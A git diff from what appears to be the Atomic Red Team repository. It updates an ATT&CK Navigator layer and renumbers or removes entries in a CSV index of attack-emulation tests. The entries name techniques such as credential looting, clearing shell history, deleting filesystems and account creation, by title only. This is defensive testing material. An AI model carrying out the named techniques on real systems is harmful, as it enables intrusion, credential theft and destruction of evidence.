Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index fa3090e86..bfa21f2da 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -130,24 +130,17 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -513,10 +506,9 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
@@ -564,11 +556,10 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -814,11 +805,10 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existi
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -909,14 +899,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
